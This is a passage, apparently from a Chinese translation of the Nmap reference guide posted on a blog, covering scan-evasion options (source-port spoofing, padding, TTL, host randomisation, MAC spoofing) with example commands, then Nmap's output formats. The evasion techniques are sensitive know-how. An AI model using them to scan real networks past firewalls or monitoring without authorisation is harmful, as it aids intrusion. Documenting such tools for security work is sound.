&lt;interface&gt;<\/code>&nbsp;(\u4f7f\u7528\u6307\u5b9a\u7684\u63a5\u53e3)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u544a\u8bc9Nmap\u4f7f\u7528\u54ea\u4e2a\u63a5\u53e3\u53d1\u9001\u548c\u63a5\u6536\u62a5\u6587\uff0cNmap\u53ef\u4ee5\u8fdb\u884c\u81ea\u52a8\u68c0\u6d4b\uff0c \u5982\u679c\u68c0\u6d4b\u4e0d\u51fa\u4f1a\u7ed9\u51fa\u63d0\u793a\u3002<code>--source-port &lt;portnumber&gt;;<\/code><code>-g &lt;portnumber&gt;<\/code>&nbsp;(\u6e90\u7aef\u53e3\u54c4\u9a97)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4ec5\u4f9d\u8d56\u4e8e\u6e90\u7aef\u53e3\u53f7\u5c31\u4fe1\u4efb\u6570\u636e\u6d41\u662f\u4e00\u79cd\u5e38\u89c1\u7684\u9519\u8bef\u914d\u7f6e\uff0c\u8fd9\u4e2a\u95ee\u9898\u975e\u5e38 \u597d\u7406\u89e3\u3002\u4f8b\u5982\u4e00\u4e2a\u7ba1\u7406\u5458\u90e8\u7f72\u4e86\u4e00\u4e2a\u65b0\u7684\u9632\u706b\u5899\uff0c\u4f46\u62db\u6765\u4e86\u5f88\u591a\u7528\u6237\u7684\u4e0d\u6ee1\uff0c\u56e0\u4e3a \u4ed6\u4eec\u7684\u5e94\u7528\u505c\u6b62\u5de5\u4f5c\u4e86\u3002\u53ef\u80fd\u662f\u7531\u4e8e\u5916\u90e8\u7684UDP DNS\u670d\u52a1\u5668\u54cd\u5e94\u65e0\u6cd5\u8fdb\u5165\u7f51\u7edc\uff0c\u800c\u5bfc\u81f4 DNS\u7684\u5d29\u6e83\u3002FTP\u662f\u53e6\u4e00\u4e2a\u5e38\u89c1\u7684\u4f8b\u5b50\uff0c\u5728FTP\u4f20\u8f93\u65f6\uff0c\u8fdc\u7a0b\u670d\u52a1\u5668\u5c1d\u8bd5\u548c\u5185\u90e8\u7528 \u5efa\u7acb\u8fde\u63a5\u4ee5\u4f20\u8f93\u6570\u636e\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5bf9\u8fd9\u4e9b\u95ee\u9898\u6709\u5b89\u5168\u89e3\u51b3\u65b9\u6848\uff0c\u901a\u5e38\u662f\u5e94\u7528\u7ea7\u4ee3\u7406\u6216\u534f\u8bae\u5206\u6790\u9632\u706b\u5899\u6a21\u5757\u3002 \u4f46\u4e5f\u5b58\u5728\u4e00\u4e9b\u4e0d\u5b89\u5168\u7684\u65b9\u6848\u3002\u6ce8\u610f\u5230DNS\u54cd\u5e94\u6765\u81ea\u4e8e53\u7aef\u53e3\uff0cFTP\u8fde\u63a5 \u6765\u81ea\u4e8e20\u7aef\u53e3\uff0c\u5f88\u591a\u7ba1\u7406\u5458\u4f1a\u6389\u5165\u4e00\u4e2a\u9677\u9631\uff0c\u5373\u5141\u8bb8\u6765\u81ea\u4e8e\u8fd9\u4e9b\u7aef\u53e3\u7684\u6570\u636e\u8fdb\u5165 \u7f51\u7edc\u3002\u4ed6\u4eec\u8ba4\u4e3a\u8fd9\u4e9b\u7aef\u53e3\u91cc\u4e0d\u4f1a\u6709\u503c\u5f97\u6ce8\u610f\u7684\u653b\u51fb\u548c\u6f0f\u6d1e\u5229\u7528\u3002\u6b64\u5916\uff0c\u7ba1\u7406\u5458 \u6216\u8bb8\u8ba4\u4e3a\u8fd9\u662f\u4e00\u4e2a\u77ed\u671f\u7684\u63aa\u65bd\uff0c\u76f4\u81f3\u4ed6\u4eec\u91c7\u53d6\u66f4\u5b89\u5168\u7684\u65b9\u6848\u3002\u4f46\u4ed6\u4eec\u5ffd\u89c6\u4e86\u5b89\u5168\u7684 \u5347\u7ea7\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e0d\u4ec5\u4ec5\u662f\u5de5\u4f5c\u91cf\u8fc7\u591a\u7684\u7f51\u7edc\u7ba1\u7406\u5458\u6389\u5165\u8fd9\u79cd\u9677\u9631\uff0c\u5f88\u591a\u4ea7\u54c1\u672c\u8eab\u4e5f\u4f1a\u6709\u8fd9\u7c7b \u4e0d\u5b89\u5168\u7684\u9690\u60a3\uff0c\u751a\u81f3\u662f\u5fae\u8f6f\u7684\u4ea7\u54c1\u3002Windows 2000\u548cWindows XP\u4e2d\u5305\u542b\u7684IPsec\u8fc7\u6ee4 \u5668\u4e5f\u5305\u542b\u4e86\u4e00\u4e9b\u9690\u542b\u89c4\u5219\uff0c\u5141\u8bb8\u6240\u6709\u6765\u81ea88\u7aef\u53e3(Kerberos)\u7684TCP\u548cUDP\u6570\u636e\u6d41\u3002\u53e6 \u4e00\u4e2a\u5e38\u89c1\u7684\u4f8b\u5b50\u662fZone Alarm\u4e2a\u4eba\u9632\u706b\u5899\u52302.1.25\u7248\u672c\u4ecd\u7136\u5141\u8bb8\u6e90\u7aef\u53e353(DNS)\u6216 67(DHCP)\u7684UDP\u5305\u8fdb\u5165\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u63d0\u4f9b\u4e86<code>-g<\/code>\u548c<code>--source-port<\/code>\u9009\u9879(\u5b83\u4eec\u662f \u7b49\u4ef7\u7684)\uff0c\u7528\u4e8e\u5229\u7528\u4e0a\u8ff0\u5f31\u70b9\u3002\u53ea\u9700\u8981\u63d0\u4f9b\u4e00\u4e2a\u7aef\u53e3\u53f7\uff0cNmap\u5c31\u53ef\u4ee5\u4ece\u8fd9\u4e9b \u7aef\u53e3\u53d1\u9001\u6570\u636e\u3002\u4e3a\u4f7f\u7279\u5b9a\u7684\u64cd\u4f5c\u7cfb\u7edf\u6b63\u5e38\u5de5\u4f5c\uff0cNmap\u5fc5\u987b\u4f7f\u7528\u4e0d\u540c\u7684\u7aef\u53e3\u53f7\u3002 DNS\u8bf7\u6c42\u4f1a\u5ffd\u7565<code>--source-port<\/code>\u9009\u9879\uff0c\u8fd9\u662f\u56e0\u4e3aNmap\u4f9d\u9760\u7cfb \u7edf\u5e93\u6765\u5904\u7406\u3002\u5927\u90e8\u5206TCP\u626b\u63cf\uff0c\u5305\u62ecSYN\u626b\u63cf\uff0c\u53ef\u4ee5\u5b8c\u5168\u652f\u6301\u8fd9\u4e9b\u9009\u9879\uff0cUDP\u626b \u63cf\u540c\u6837\u5982\u6b64\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1anmap --source-port 53 172.27.42.110 &nbsp;\/\/\u8fd9\u91cc\u6307\u5b9a 53 \u7aef\u53e3\u3002\u4e5f\u53ef\u4ee5\u6307\u5b9a\u5176\u4ed6\u7aef\u53e3<code>--data-length &lt;number&gt;<\/code>&nbsp;(\u53d1\u9001\u62a5\u6587\u65f6 \u9644\u52a0\u968f\u673a\u6570\u636e)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u6b63\u5e38\u60c5\u51b5\u4e0b\uff0cNmap\u53d1\u9001\u6700\u5c11\u7684\u62a5\u6587\uff0c\u53ea\u542b\u4e00\u4e2a\u5305\u5934\u3002\u56e0\u6b64TCP\u5305\u901a\u5e38 \u662f40\u5b57\u8282\uff0cICMP ECHO\u8bf7\u6c42\u53ea\u670928\u5b57\u8282\u3002\u8fd9\u4e2a\u9009\u9879\u544a\u8bc9Nmap\u5728\u53d1\u9001\u7684\u62a5\u6587\u4e0a \u9644\u52a0\u6307\u5b9a\u6570\u91cf\u7684\u968f\u673a\u5b57\u8282\u3002\u64cd\u4f5c\u7cfb\u7edf\u68c0\u6d4b(<code>-O<\/code>)\u5305\u4e0d\u53d7\u5f71\u54cd\uff0c \u4f46\u5927\u90e8\u5206ping\u548c\u7aef\u53e3\u626b\u63cf\u5305\u53d7\u5f71\u54cd\uff0c\u8fd9\u4f1a\u4f7f\u5904\u7406\u53d8\u6162\uff0c\u4f46\u5bf9\u626b\u63cf\u7684\u5f71\u54cd\u8f83\u5c0f\u3002\u4f8b\u5b50\uff1anmap --data-length 30&nbsp;172.27.42.110 &nbsp;\/\/\u6307\u5b9a\u5bf9\u76ee\u6807\u4e3b\u673a\u53d1\u9001 30\u5b57\u8282 \u5927\u5c0f\u7684 \u5305<code>--ttl &lt;value&gt;<\/code>&nbsp;(\u8bbe\u7f6eIP time-to-live\u57df)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8bbe\u7f6eIPv4\u62a5\u6587\u7684time-to-live\u57df\u4e3a\u6307\u5b9a\u7684\u503c\u3002<code>--randomize-hosts<\/code>&nbsp;(\u5bf9\u76ee\u6807\u4e3b\u673a\u7684\u987a\u5e8f\u968f\u673a\u6392\u5217)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u544a\u8bc9Nmap\u5728\u626b\u63cf\u4e3b\u673a\u524d\u5bf9\u6bcf\u4e2a\u7ec4\u4e2d\u7684\u4e3b\u673a\u968f\u673a\u6392\u5217\uff0c\u6700\u591a\u53ef\u8fbe 8096\u4e2a\u4e3b\u673a\u3002\u8fd9\u4f1a\u4f7f\u5f97\u626b\u63cf\u9488\u5bf9\u4e0d\u540c\u7684\u7f51\u7edc\u76d1\u63a7\u7cfb\u7edf\u6765\u8bf4\u53d8\u5f97\u4e0d\u662f\u5f88 \u660e\u663e\uff0c\u7279\u522b\u662f\u914d\u5408\u503c\u8f83\u5c0f\u7684\u65f6\u95f4\u9009\u9879\u65f6\u66f4\u6709\u6548\u3002\u5982\u679c\u9700\u8981\u5bf9\u4e00\u4e2a\u8f83\u5927 \u7684\u7ec4\u8fdb\u884c\u968f\u673a\u6392\u5217\uff0c\u9700\u8981\u589e\u5927<code>nmap.h<\/code>\u6587\u4ef6\u4e2d PING-GROUP-SZ\u7684\u503c\uff0c\u5e76\u91cd\u65b0\u7f16\u8bd1\u3002\u53e6\u4e00\u79cd\u65b9\u6cd5\u662f\u4f7f\u7528\u5217\u8868\u626b\u63cf (<code>-sL -n -oN<em><code>&lt;filename&gt;<\/code><\/em><\/code>)\uff0c\u4ea7\u751f\u76ee\u6807IP\u7684\u5217\u8868\uff0c \u4f7f\u7528Perl\u811a\u672c\u8fdb\u884c\u968f\u673a\u5316\uff0c\u7136\u540e\u4f7f\u7528<code>-iL<\/code>\u63d0\u4f9b\u7ed9Nmap\u3002<code>--spoof-mac &lt;mac address\uff0cprefix\uff0cor vendor name&gt;<\/code>&nbsp;(MAC\u5730\u5740\u54c4\u9a97)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42Nmap\u5728\u53d1\u9001\u539f\u4ee5\u592a\u7f51\u5e27\u65f6\u4f7f\u7528\u6307\u5b9a\u7684MAC\u5730\u5740\uff0c\u8fd9\u4e2a\u9009\u9879\u9690\u542b\u4e86&nbsp;<code>--send-eth<\/code>\u9009\u9879\uff0c\u4ee5\u4fdd\u8bc1Nmap\u771f\u6b63\u53d1\u9001\u4ee5\u592a\u7f51\u5305\u3002MAC\u5730\u5740\u6709\u51e0 \u79cd\u683c\u5f0f\u3002\u5982\u679c\u7b80\u5355\u5730\u4f7f\u7528\u5b57\u7b26\u4e32\u201c0\u201d\uff0cNmap\u9009\u62e9\u4e00\u4e2a\u5b8c\u5168\u968f\u673a\u7684MAC \u5730\u5740\u3002\u5982\u679c\u7ed9\u5b9a\u7684\u5b57\u7b26\u4e32\u662f\u4e00\u4e2a16\u8fdb\u5236\u5076\u6570(\u4f7f\u7528:\u5206\u9694)\uff0cNmap\u5c06\u4f7f\u7528\u8fd9\u4e2aMAC\u5730\u5740\u3002 \u5982\u679c\u662f\u5c0f\u4e8e12\u768416\u8fdb\u5236\u6570\u5b57\uff0cNmap\u4f1a\u968f\u673a\u586b\u5145\u5269\u4e0b\u76846\u4e2a\u5b57\u8282\u3002\u5982\u679c\u53c2\u6570\u4e0d\u662f0\u621616\u8fdb \u5236\u5b57\u7b26\u4e32\uff0cNmap\u5c06\u901a\u8fc7<code>nmap-mac-prefixes<\/code>\u67e5\u627e \u5382\u5546\u7684\u540d\u79f0(\u5927\u5c0f\u5199\u533a\u5206)\uff0c\u5982\u679c\u627e\u5230\u5339\u914d\uff0cNmap\u5c06\u4f7f\u7528\u5382\u5546\u7684OUI(3\u5b57\u8282\u524d\u7f00)\uff0c\u7136\u540e \u968f\u673a\u586b\u5145\u5269\u4f59\u76843\u4e2a\u8282\u5b57\u3002\u6b63\u786e\u7684<code>--spoof-mac<\/code>\u53c2\u6570\u6709\uff0c&nbsp;<code>Apple<\/code>\uff0c&nbsp;<code>0<\/code>\uff0c<code>01:02:03:04:05:06<\/code>\uff0c&nbsp;<code>deadbeefcafe<\/code>\uff0c<code>0020F2<\/code>\uff0c \u548c<code>Cisco<\/code>.<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4f8b\u5b50\uff1a nmap -sT -PN --spoof-mac 0&nbsp;172.27.42.110 &nbsp;<\/p>\n\n\n<h1 class=\"wp-block-heading\">\u8f93\u51fa<\/h1>\n\n\n<p class=\"wp-block-paragraph\">\u4efb\u4f55\u5b89\u5168\u5de5\u5177\u53ea\u6709\u5728\u8f93\u51fa\u7ed3\u679c\u65f6\u624d\u662f\u6709\u4ef7\u503c\u7684\uff0c\u5982\u679c\u6ca1\u6709\u901a\u8fc7\u7ec4\u7ec7\u548c \u6613\u4e8e\u7406\u89e3\u7684\u65b9\u5f0f\u6765\u8868\u8fbe\uff0c\u590d\u6742\u7684\u6d4b\u8bd5\u548c\u7b97\u6cd5\u51e0\u4e4e\u6ca1\u6709\u610f\u4e49\u3002Nmap\u63d0\u4f9b\u4e86\u4e00\u4e9b \u65b9\u5f0f\u4f9b\u7528\u6237\u548c\u5176\u5b83\u8f6f\u4ef6\u4f7f\u7528\uff0c\u5b9e\u9645\u4e0a\uff0c\u6ca1\u6709\u4e00\u79cd\u65b9\u5f0f\u53ef\u4ee5\u4f7f\u6240\u6709\u4eba\u6ee1\u610f\u3002 \u56e0\u6b64Nmap\u63d0\u4f9b\u4e86\u4e00\u4e9b\u683c\u5f0f\uff0c\u5305\u542b\u4e86\u65b9\u4fbf\u76f4\u63a5\u67e5\u770b\u7684\u4ea4\u4e92\u65b9\u5f0f\u548c\u65b9\u4fbf\u8f6f\u4ef6\u5904\u7406 \u7684XML\u683c\u5f0f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u9664\u4e86\u63d0\u4f9b\u8f93\u51fa\u683c\u5f0f\u5916\uff0cNmap\u8fd8\u63d0\u4f9b\u4e86\u9009\u9879\u6765\u63a7\u5236\u8f93\u51fa\u7684\u7ec6\u8282\u4ee5\u53ca\u8c03\u8bd5 \u4fe1\u606f\u3002\u8f93\u51fa\u5185\u5bb9\u53ef\u53d1\u9001\u7ed9\u6807\u51c6\u8f93\u51fa\u6216\u547d\u540d\u6587\u4ef6\uff0c\u53ef\u4ee5\u8ffd\u52a0\u6216\u8986\u76d6\u3002\u8f93\u51fa\u6587\u4ef6\u8fd8\u53ef \u88ab\u7528\u4e8e\u7ee7\u7eed\u4e2d\u65ad\u7684\u626b\u63cf\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u63d0\u4f9b5\u79cd\u4e0d\u540c\u7684\u8f93\u51fa\u683c\u5f0f\u3002\u9ed8\u8ba4\u7684\u65b9\u5f0f\u662f<code>interactive output<\/code>\uff0c \u53d1\u9001\u7ed9\u6807\u51c6\u8f93\u51fa(stdout)\u3002<code>normal output<\/code>\u65b9\u5f0f\u7c7b\u4f3c\u4e8e&nbsp;<code>interactive<\/code>\uff0c\u4f46\u663e\u793a\u8f83\u5c11\u7684\u8fd0\u884c\u65f6\u95f4\u4fe1\u606f \u548c\u544a\u8b66\u4fe1\u606f\uff0c\u8fd9\u662f\u7531\u4e8e\u8fd9\u4e9b\u4fe1\u606f\u662f\u5728\u626b\u63cf\u5b8c\u5168\u7ed3\u675f\u540e\u7528\u4e8e\u5206\u6790\uff0c\u800c\u4e0d\u662f\u4ea4\u4e92\u5f0f\u7684\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">XML\u8f93\u51fa\u662f\u6700\u91cd\u8981\u7684\u8f93\u51fa\u7c7b\u578b\uff0c\u53ef\u88ab\u8f6c\u6362\u6210HTML\uff0c\u5bf9\u4e8e\u7a0b\u5e8f\u5904\u7406\u975e\u5e38\u65b9\u4fbf\uff0c \u5982\u7528\u4e8eNmap\u56fe\u5f62\u7528\u6237\u63a5\u53e3\u6216\u5bfc\u5165\u6570\u636e\u5e93\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u53e6\u4e24\u79cd\u8f93\u51fa\u7c7b\u578b\u6bd4\u8f83\u7b80\u5355\uff0c<code>grepable output<\/code>\u683c\u5f0f\uff0c\u5728\u4e00\u884c\u4e2d\u5305\u542b\u76ee\u6807\u4e3b\u673a\u6700\u591a\u7684\u4fe1\u606f\uff1b<code>sCRiPt KiDDi3 0utPUt<\/code>&nbsp;\u683c\u5f0f\uff0c\u7528\u4e8e\u8003\u8651\u81ea\u5df1\u7684\u7528\u6237 |&lt;-r4d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4ea4\u4e92\u5f0f\u8f93\u51fa\u662f\u9ed8\u8ba4\u65b9\u5f0f\uff0c\u6ca1\u6709\u76f8\u5e94\u7684\u547d\u4ee4\u884c\u9009\u9879\uff0c\u5176\u5b83\u56db\u79cd\u683c\u5f0f\u9009\u9879 \u4f7f\u7528\u76f8\u540c\u7684\u8bed\u6cd5\uff0c\u91c7\u7528\u4e00\u4e2a\u53c2\u6570\uff0c\u5373\u5b58\u653e\u7ed3\u679c\u7684\u6587\u4ef6\u540d\u3002\u591a\u79cd\u683c\u5f0f\u53ef\u540c\u65f6 \u4f7f\u7528\uff0c\u4f46\u4e00\u79cd\u683c\u5f0f\u53ea\u80fd\u4f7f\u7528\u4e00\u6b21\u3002\u4f8b\u5982\uff0c\u5728\u6807\u51c6\u8f93\u51fa\u7528\u4e8e\u67e5\u770b\u7684\u540c\u65f6\uff0c\u53ef\u5c06\u7ed3 \u679c\u4fdd\u5b58\u5230XML\u6587\u4ef6\u7528\u4e8e\u7a0b\u5e8f\u5206\u6790\uff0c\u8fd9\u65f6\u53ef\u4ee5\u4f7f\u7528\u9009\u9879<code>-oX myscan.xml -oN myscan.nmap<\/code>\u3002 \u4e3a\u4fbf\u4e8e\u63cf\u8ff0\u7684\u7b80\u5316\uff0c\u672c\u7ae0\u4f7f\u7528\u7c7b\u4f3c\u4e8e<code>myscan.xml<\/code>\u7684\u7b80\u5355\u6587\u4ef6\u540d\uff0c \u5efa\u8bae\u91c7\u7528\u66f4\u5177\u6709\u63cf\u8ff0\u6027\u7684\u6587\u4ef6\u540d\u3002\u6587\u4ef6\u540d\u7684\u9009\u62e9\u4e0e\u4e2a\u4eba\u559c\u597d\u6709\u5173\uff0c\u5efa\u8bae\u589e\u52a0 \u626b\u63cf\u65e5\u671f\u4ee5\u53ca\u4e00\u5230\u4e24\u4e2a\u5355\u8bcd\u6765\u63cf\u8ff0\uff0c\u5e76\u653e\u7f6e\u4e8e\u4e00\u4e2a\u76ee\u5f55\u4e2d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u5728\u5c06\u7ed3\u679c\u8f93\u51fa\u5230\u6587\u4ef6\u7684\u540c\u65f6\uff0cNmap\u4ecd\u5c06\u7ed3\u679c\u53d1\u9001\u7ed9\u6807\u51c6\u8f93\u51fa\u3002\u4f8b\u5982\uff0c \u547d\u4ee4<strong>nmap -oX myscan.xml target<\/strong>\u5c06 \u8f93\u51faXML\u81f3<code>myscan.xml<\/code>\uff0c\u5e76\u5728stdout \u4e0a\u6253\u5370\u76f8\u540c\u7684\u4ea4\u4e92\u5f0f\u7ed3\u679c\uff0c\u800c\u6b64\u65f6<code>-oX<\/code>\u9009\u9879\u6ca1\u6709\u91c7\u7528\u3002\u53ef\u4ee5 \u4f7f\u7528\u8fde\u5b57\u7b26\u4f5c\u4e3a\u9009\u9879\u6765\u6539\u53d8\uff0c\u8fd9\u4f7f\u5f97Nmap\u7981\u6b62\u4ea4\u4e92\u5f0f\u8f93\u51fa\uff0c\u800c\u662f\u5c06\u7ed3\u679c\u6253\u5370\u5230 \u6240\u6307\u5b9a\u7684\u6807\u51c6\u8f93\u51fa\u6d41\u4e2d\u3002\u56e0\u6b64\uff0c\u547d\u4ee4<strong>nmap -oX - target<\/strong>\u53ea \u8f93\u51faXML\u81f3\u6807\u51c6\u8f93\u51fastdout\u3002\u4e25\u91cd\u9519\u8bef\u4ecd\u7136\u662f\u8f93\u51fa\u5230\u6807\u51c6\u9519\u8bef\u6d41stderr\u4e2d\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u4e0e\u5176\u5b83Nmap\u53c2\u6570\u4e0d\u540c\uff0c\u65e5\u5fd7\u6587\u4ef6\u9009\u9879\u7684\u7a7a\u683c(\u5982<code>-oX<\/code>)\u548c \u6587\u4ef6\u540d\u6216\u8fde\u5b57\u7b26\u662f\u5fc5\u9700\u7684\u3002\u5982\u679c\u7701\u7565\u4e86\u6807\u8bb0\uff0c\u4f8b\u5982<code>-oG-<\/code>\u6216&nbsp;<code>-oXscan.xml<\/code>\uff0cNmap\u7684\u5411\u540e\u517c\u5bb9\u7279\u70b9\u5c06\u5efa\u7acb&nbsp;<em>\u6807\u51c6\u683c\u5f0f<\/em>\u7684\u8f93\u51fa\u6587\u4ef6\uff0c\u76f8\u5e94\u7684\u6587\u4ef6\u540d\u4e3a<code>G-<\/code>\u548c&nbsp;<code>Xscan.xml<\/code>\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">Nmap\u8fd8\u63d0\u4f9b\u4e86\u63a7\u5236\u626b\u63cf\u7ec6\u8282\u4ee5\u53ca\u8f93\u51fa\u6587\u4ef6\u7684\u6dfb\u52a0\u6216\u8986\u76d6\u7684\u9009\u9879\uff0c\u8fd9\u4e9b\u9009\u9879 \u5982\u4e0b\u6240\u8ff0\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\"><strong>Nmap\u8f93\u51fa\u683c\u5f0f<\/strong><code>-oN &lt;filespec&gt;<\/code>&nbsp;(\u6807\u51c6\u8f93\u51fa)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42\u5c06<code>\u6807\u51c6\u8f93\u51fa<\/code>\u76f4\u63a5\u5199\u5165\u6307\u5b9a \u7684\u6587\u4ef6\u3002\u5982\u4e0a\u6240\u8ff0\uff0c\u8fd9\u4e2a\u683c\u5f0f\u4e0e<code>\u4ea4\u4e92\u5f0f\u8f93\u51fa<\/code>&nbsp;\u7565\u6709\u4e0d\u540c\u3002<code>-oX &lt;filespec&gt;<\/code>&nbsp;(XML\u8f93\u51fa)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8981\u6c42<code>XML\u8f93\u51fa<\/code>\u76f4\u63a5\u5199\u5165\u6307\u5b9a \u7684\u6587\u4ef6\u3002Nmap\u5305\u542b\u4e86\u4e00\u4e2a\u6587\u6863\u7c7b\u578b\u5b9a\u4e49(DTD)\uff0c\u4f7fXML\u89e3\u6790\u5668\u6709\u6548\u5730 \u8fdb\u884cXML\u8f93\u51fa\u3002\u8fd9\u4e3b\u8981\u662f\u4e3a\u4e86\u7a0b\u5e8f\u5e94\u7528\uff0c\u540c\u65f6\u4e5f\u53ef\u4ee5\u534f\u52a9\u4eba\u5de5\u89e3\u91ca Nmap\u7684XML\u8f93\u51fa\u3002DTD\u5b9a\u4e49\u4e86\u5408\u6cd5\u7684\u683c\u5f0f\u5143\u7d20\uff0c\u5217\u4e3e\u53ef\u4f7f\u7528\u7684\u5c5e\u6027\u548c \u503c\u3002\u6700\u65b0\u7684\u7248\u672c\u53ef\u5728&nbsp;<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/data\/nmap.dtd\" rel=\"noreferrer noopener\" rel=\"nofollow\" ><a href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.insecure.org\/nmap\/data\/nmap.dtd\" rel=\"nofollow\" >http:\/\/www.insecure.org\/nmap\/data\/nmap.dtd<\/a><\/a>\u83b7\u53d6\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">XML\u63d0\u4f9b\u4e86\u53ef\u4f9b\u8f6f\u4ef6\u89e3\u6790\u7684\u7a33\u5b9a\u683c\u5f0f\u8f93\u51fa\uff0c\u4e3b\u8981\u7684\u8ba1\u7b97\u673a \u8bed\u8a00\u90fd\u63d0\u4f9b\u4e86\u514d\u8d39\u7684XML\u89e3\u6790\u5668\uff0c\u5982C\/C++\uff0cPerl\uff0cPython\u548cJava\u3002 \u9488\u5bf9\u8fd9\u4e9b\u8bed\u8a00\u6709\u4e00\u4e9b\u6346\u7ed1\u4ee3\u7801\u7528\u4e8e\u5904\u7406Nmap\u7684\u8f93\u51fa\u548c\u7279\u5b9a\u7684\u6267\u884c\u7a0b\u5e8f\u3002 \u4f8b\u5982perl CPAN\u4e2d\u7684<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/sourceforge.net\/projects\/nmap-scanner\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" >Nmap::Scanner<\/a>&nbsp;\u548c<a target=\"_blank\" href=\"https:\/\/byy3.com\/go\/?url=http:\/\/www.nmapparser.com\/\" rel=\"noreferrer noopener\" rel=\"nofollow\" >Nmap::Parser<\/a>\u3002 \u5bf9\u51e0\u4e4e\u6240\u6709\u4e0eNmap\u6709\u63a5\u53e3\u7684\u4e3b\u8981\u5e94\u7528\u6765\u8bf4\uff0cXML\u662f\u9996\u9009\u7684\u683c\u5f0f\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">XML\u8f93\u51fa\u5f15\u7528\u4e86\u4e00\u4e2aXSL\u6837\u5f0f\u8868\uff0c\u7528\u4e8e\u683c\u5f0f\u5316\u8f93\u51fa\u7ed3\u679c\uff0c\u7c7b\u4f3c\u4e8e HTML\u3002\u6700\u65b9\u4fbf\u7684\u65b9\u6cd5\u662f\u5c06XML\u8f93\u51fa\u52a0\u8f7d\u5230\u4e00\u4e2aWeb\u6d4f\u89c8\u5668\uff0c\u5982Firefox \u6216IE\u3002\u7531\u4e8e<code>nmap.xsl<\/code>\u6587\u4ef6\u7684\u7edd\u5bf9 \u8def\u5f84\uff0c\u56e0\u6b64\u901a\u5e38\u53ea\u80fd\u5728\u8fd0\u884c\u4e86Nmap\u7684\u673a\u5668\u4e0a\u5de5\u4f5c(\u6216\u7c7b\u4f3c\u914d\u7f6e\u7684\u673a\u5668)\u3002 \u7c7b\u4f3c\u4e8e\u4efb\u4f55\u652f\u6301Web\u673a\u5668\u7684HTML\u6587\u4ef6\uff0c<code>--stylesheet<\/code>&nbsp;\u9009\u9879\u53ef\u7528\u4e8e\u5efa\u7acb\u53ef\u79fb\u690d\u7684XML\u6587\u4ef6\u3002<code>-oS &lt;filespec&gt;<\/code>&nbsp;(ScRipT KIdd|3 oUTpuT)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u811a\u672c\u5c0f\u5b50\u8f93\u51fa\u7c7b\u4f3c\u4e8e\u4ea4\u4e92\u5de5\u5177\u8f93\u51fa\uff0c\u8fd9\u662f\u4e00\u4e2a\u4e8b\u540e\u5904\u7406\uff0c\u9002\u5408\u4e8e 'l33t HaXXorZ\uff0c \u7531\u4e8e\u539f\u6765\u5168\u90fd\u662f\u5927\u5199\u7684Nmap\u8f93\u51fa\u3002\u8fd9\u4e2a\u9009\u9879\u548c\u811a\u672c\u5c0f\u5b50\u5f00\u4e86\u73a9\u7b11\uff0c\u770b\u4e0a\u53bb\u4f3c\u4e4e\u662f\u4e3a\u4e86&nbsp;\u201c\u5e2e\u52a9\u4ed6\u4eec\u201d\u3002<code>-oG &lt;filespec&gt;<\/code>&nbsp;(Grep\u8f93\u51fa)<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u79cd\u65b9\u5f0f\u6700\u540e\u4ecb\u7ecd\uff0c\u56e0\u4e3a\u4e0d\u5efa\u8bae\u4f7f\u7528\u3002XML\u8f93\u683c\u5f0f\u5f88\u5f3a\u5927\uff0c\u4fbf\u4e8e\u6709\u7ecf\u9a8c \u7684\u7528\u6237\u4f7f\u7528\u3002XML\u662f\u4e00\u79cd\u6807\u51c6\uff0c\u7531\u8bb8\u591a\u89e3\u6790\u5668\u6784\u6210\uff0c\u800cGrep\u8f93\u5c4a\u66f4\u7b80\u5316\u3002XML \u662f\u53ef\u6269\u5c55\u7684\uff0c\u4ee5\u652f\u6301\u65b0\u53d1\u5e03\u7684Nmap\u7279\u70b9\u3002\u4f7f\u7528Grep\u8f93\u51fa\u7684\u76ee\u7684\u662f\u5ffd\u7565\u8fd9\u4e9b \u7279\u70b9\uff0c\u56e0\u4e3a\u6ca1\u6709\u8db3\u591f\u7684\u7a7a\u95f4\u3002<\/p>\n\n\n<p class=\"wp-block-paragraph\">\u7136\u9762\uff0cGrep\u8f93\u51fa\u4ecd\u7136\u5f88\u5e38\u4f7f\u7528\u3002\u5b83\u662f\u4e00\u79cd\u7b80\u5355\u683c\u5f0f\uff0c\u6bcf\u884c\u4e00\u4e2a\u4e3b\u673a\uff0c\u53ef\u4ee5 \u901a\u8fc7UNIX\u5de5\u5177(\u5982grep\u3001awk\u3001cut\u3001sed\u3001diff)\u548cPerl\u65b9\u4fbf\u5730\u67e5\u627e\u548c\u5206\u89e3\u3002\u5e38\u53ef 